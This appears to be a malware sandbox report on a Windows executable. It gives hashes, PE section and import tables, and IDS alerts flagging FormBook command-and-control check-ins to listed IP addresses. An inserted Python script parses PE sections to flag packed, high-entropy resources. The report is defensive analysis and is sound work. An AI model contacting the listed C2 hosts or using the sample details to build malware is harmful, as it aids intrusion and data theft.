MD5: 008DF983F881B54E58FCA55BDC6F9B6A
SHA1: D237FA9E24E95E173888914EA48C24348EB2EF50
SHA-256: 8EF28ACE4E785A2E441B7E93F17A59E4F219458B1BDB3DDD4811BD3D86FA4C18
SHA-512: 6218A9BD480ECB35EAED3F7B63804D5C4BB4753D583D471F5CD130B8D408719FE95ABFECA12950CEE2E91D72203C6655600D9979F3EA8BE16FA498373F8229EB
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\TOgpmvvWoj.exe
File Type: data
Category: dropped
Size (bytes): 270848
Entropy (8bit): 7.993134250488098
Encrypted: true
SSDEEP: 6144:7Fx5MWQ69r7WG1hNDlrRBriqbeJ3+8NdaeeKOgkQY/UZVQ1btihB:Bx5V3WG1/PZiFDNRefn/aWtID
MD5: A3F6B9D7C03C4FB2E5137778DA6BD323
SHA1: 9F6B160FD5A4958B42DC19F28E07DB736DCAE831
SHA-256: AEA551700EA528FBC5DAC1FDE76DA8E4DDC60A1A261E5E087F21737B64EA709C
SHA-512: A3169A7D7E82AFFBC13B488B44D5C6B332C0DE8CE29F1103B02670F4683771FDFB101815D11194FEAD54A2D6063772AE515CF482DD1BB2B891D5306402A28905
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.130712948881586
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: TOgpmvvWoj.exe
File size: 1'180'160 bytes
MD5: 93e69765594e80ad7f8c1e906f145046
SHA1: f5d842cc344e4e1623dfcdd2ce32c73ee4ad05cb
SHA256: 4815f332b8be3f9e2b173e71e751f994570fd23b0f7d3f7c519369f909f0b3c0
SHA512: 8e6e5d75631b7270ce767e7b89d44d4cbb5bef73ae01d6232c762f6e29ee989efed1b008cb2361e88e5ff35ea376774ad8113590ff37c86cf193037cd0d407d0
SSDEEP: 24576:rAHnh+eWsN3skA4RV1Hom2KXMmHaYYfJ1Rs0AncaVu8q5:Gh+ZkldoPK8YaYYfJ2XMt
TLSH: BD45BE0273D1C036FFABA2739B6AF60556BC79254133852F13982DB9BD701B2263D663
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x42800a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x667B4D1D [Tue Jun 25 23:05:01 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
                                          Instruction
                                          call 00007FC454C3206Dh
                                          jmp 00007FC454C24E24h
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          push edi
                                          push esi
                                          mov esi, dword ptr [esp+10h]
                                          mov ecx, dword ptr [esp+14h]
                                          mov edi, dword ptr [esp+0Ch]
                                          mov eax, ecx
                                          mov edx, ecx
                                          add eax, esi
                                          cmp edi, esi
                                          jbe 00007FC454C24FAAh
                                          cmp edi, eax
                                          jc 00007FC454C2530Eh
                                          bt dword ptr [004C41FCh], 01h
                                          jnc 00007FC454C24FA9h
                                          rep movsb
                                          jmp 00007FC454C252BCh
                                          cmp ecx, 00000080h
                                          jc 00007FC454C25174h
                                          mov eax, edi
                                          xor eax, esi
                                          test eax, 0000000Fh
                                          jne 00007FC454C24FB0h
                                          bt dword ptr [004BF324h], 01h
                                          jc 00007FC454C25480h
                                          bt dword ptr [004C41FCh], 00000000h
                                          jnc 00007FC454C2514Dh
                                          test edi, 00000003h
                                          jne 00007FC454C2515Eh
                                          test esi, 00000003h
                                          jne 00007FC454C2513Dh
                                          bt edi, 02h
                                          jnc 00007FC454C24FAFh
                                          mov eax, dword ptr [esi]
                                          sub ecx, 04h
                                          lea esi, dword ptr [esi+04h]
                                          mov dword ptr [edi], eax
                                          lea edi, dword ptr [edi+04h]
                                          bt edi, 03h
                                          jnc 00007FC454C24FB3h
                                          movq xmm1, qword ptr [esi]
                                          sub ecx, 08h
                                          lea esi, dword ptr [esi+08h]
                                          movq qword ptr [edi], xmm1
                                          lea edi, dword ptr [edi+08h]
                                          test esi, 00000007h
                                          je 00007FC454C25005h
                                          bt esi, 03h
                                          Programming Language:
                                          • [ASM] VS2013 build 21005
                                          • [ C ] VS2013 build 21005
                                          • [C++] VS2013 build 21005
                                          • [ C ] VS2008 SP1 build 30729
                                          • [IMP] VS2008 SP1 build 30729
                                          • [ASM] VS2013 UPD5 build 40629
                                          • [RES] VS2013 build 21005
                                          • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x55a08 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11e000 | 0x7134 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc8000 | 0x55a08 | 0x55c00 | 37b95ce5debdafd9a5847a1266a84308 | False | 0.922603862973761 | data | 7.884012749927017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11e000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xd07b8 | 0x4ccce | data | | | 1.000336963639716
RT_GROUP_ICON | 0x11d488 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x11d500 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x11d514 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x11d528 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x11d53c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x11d618 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
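The two numbers in the section and resource tables that decide how a reviewer proceeds are the .rsrc entropy (7.88 bits per byte over 0x55c00 bytes, almost all of it the single 0x4ccce-byte RT_RCDATA entry with ZLIB complexity of about 1.0 and no language tag, which is consistent with where a compiled AutoIt script is stored) and the .data line, whose Virtual Size 0x8f74 exceeds its Raw Size 0x5200 only because the loader zero-fills an uninitialised tail, which is normal. The script below, an example added here and not part of the Joe Sandbox report, shows how those columns are computed from the raw section table and how to turn them into the checks: it parses the PE section headers by hand, computes the Shannon entropy that the Entropy column reports, decodes the IMAGE_SCN_* characteristics, and flags large high-entropy sections and writable-and-executable ones. The input is a constructed, non-loadable PE image (no optional header) built in the same file, with a SHA-256-generated blob standing in for the packed .rsrc; the entropy threshold 7.0 and the 0x8000-byte minimum are this example's choices, not values from the report.

```python
import hashlib
import struct
from collections import Counter
from math import log2

# IMAGE_SCN_* characteristic bits from the PE/COFF spec (the ones the report prints).
SCN_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x02000000: "IMAGE_SCN_MEM_DISCARDABLE",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0..8.0; this is the metric behind the report's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> list:
    """DOS header -> PE signature -> COFF header -> section table.
    Returns one dict per section with the fields the report tabulates."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_of_optional
    sections = []
    for i in range(num_sections):
        off = table + i * 40                                   # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        raw = pe[raw_ptr:raw_ptr + raw_size]                   # bytes as stored on disk
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "raw_size": raw_size,
            "entropy": shannon_entropy(raw),
            "flags": [n for bit, n in sorted(SCN_FLAGS.items()) if chars & bit],
        })
    return sections


def triage(sections: list, high_entropy: float = 7.0, min_raw: int = 0x8000) -> dict:
    """Static checks on the section table. Thresholds are this example's choice."""
    findings = {}
    for s in sections:
        notes = []
        if s["entropy"] >= high_entropy and s["raw_size"] >= min_raw:
            notes.append(f"entropy {s['entropy']:.2f} over {s['raw_size']:#x} bytes: "
                         "compressed or encrypted payload, unpack before static analysis")
        if "IMAGE_SCN_MEM_WRITE" in s["flags"] and "IMAGE_SCN_MEM_EXECUTE" in s["flags"]:
            notes.append("writable and executable section (unpacker stub or self-modifying code)")
        if s["vsize"] > s["raw_size"]:
            notes.append(f"info: {s['vsize'] - s['raw_size']:#x} bytes zero-filled at load "
                         "(uninitialised tail, normal for .data)")
        if notes:
            findings[s["name"]] = notes
    return findings


def build_synthetic_pe(specs: list) -> bytes:
    """Minimal, non-loadable PE (no optional header) from (name, raw, characteristics)
    tuples. Constructed test input only; a real sample is read from disk instead."""
    n = len(specs)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                    # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0, 0x0102)  # i386, SizeOfOptionalHeader = 0
    table, blobs = b"", b""
    ptr, va = 0x40 + 4 + 20 + n * 40, 0x1000
    for name, raw, chars in specs:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"),
                             len(raw), va, len(raw), ptr, 0, 0, 0, 0, chars)
        blobs += raw
        ptr += len(raw)
        va += (len(raw) + 0xFFF) & ~0xFFF                      # next 4 KiB-aligned RVA
    return bytes(dos) + b"PE\0\0" + coff + table + blobs


# Constructed stand-in for a packed .rsrc: 64 KiB of SHA-256 output (deterministic, ~8 bits/byte).
HIGH_ENTROPY_BLOB = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(2048))

SAMPLE_PE = build_synthetic_pe([
    (b".text", b"\x90\xc3" * 0x800, 0x60000020),   # CODE | EXECUTE | READ
    (b".data", b"\0" * 0x200, 0xC0000040),         # INITIALIZED_DATA | READ | WRITE
    (b".rsrc", HIGH_ENTROPY_BLOB, 0x40000040),     # INITIALIZED_DATA | READ
])

if __name__ == "__main__":
    secs = parse_sections(SAMPLE_PE)
    for s in secs:
        print(f"{s['name']:<8}{s['va']:#10x}{s['vsize']:#10x}{s['raw_size']:#10x}"
              f"  {s['entropy']:.3f}  {', '.join(s['flags'])}")
    for name, notes in triage(secs).items():
        print(f"{name}: " + "; ".join(notes))
```

To run it against the sample itself, replace SAMPLE_PE with the file's bytes; the entropy of the real .rsrc is dominated by the RT_RCDATA blob, so the next step is to carve that resource (RVA 0xd07b8, size 0x4ccce) rather than to keep reading the section statistics.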
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/04/24-16:52:52.254180 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49705 | 80 | 192.168.2.7 | 217.160.0.106
07/04/24-16:52:54.789097 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49706 | 80 | 192.168.2.7 | 217.160.0.106
07/04/24-16:53:22.021315 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49712 | 80 | 192.168.2.7 | 208.91.197.27
07/04/24-16:53:24.553352 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49713 | 80 | 192.168.2.7 | 208.91.197.27
07/04/24-16:53:44.361554 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49716 | 80 | 192.168.2.7 | 43.252.167.188
07/04/24-16:53:46.900097 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49717 | 80 | 192.168.2.7 | 43.252.167.188
07/04/24-16:53:58.144607 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49720 | 80 | 192.168.2.7 | 194.9.94.85
07/04/24-16:54:00.682084 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49721 | 80 | 192.168.2.7 | 194.9.94.85
07/04/24-16:54:12.061387 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49724 | 80 | 192.168.2.7 | 23.251.54.212
07/04/24-16:54:14.588408 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49725 | 80 | 192.168.2.7 | 23.251.54.212
07/04/24-16:54:46.311846 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49728 | 80 | 192.168.2.7 | 199.192.19.19
07/04/24-16:54:48.852255 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49729 | 80 | 192.168.2.7 | 199.192.19.19
07/04/24-16:54:59.779589 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49732 | 80 | 192.168.2.7 | 213.145.228.16
07/04/24-16:55:02.327495 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49733 | 80 | 192.168.2.7 | 213.145.228.16
07/04/24-16:55:13.231476 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49736 | 80 | 192.168.2.7 | 91.195.240.19
07/04/24-16:55:15.777514 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49737 | 80 | 192.168.2.7 | 91.195.240.19
07/04/24-16:55:26.621590 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49740 | 80 | 192.168.2.7 | 194.58.112.174
07/04/24-16:55:29.149800 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49741 | 80 | 192.168.2.7 | 194.58.112.174
07/04/24-16:55:40.027987 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49744 | 80 | 192.168.2.7 | 172.67.210.102
07/04/24-16:55:42.557594 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49745 | 80 | 192.168.2.7 | 172.67.210.102
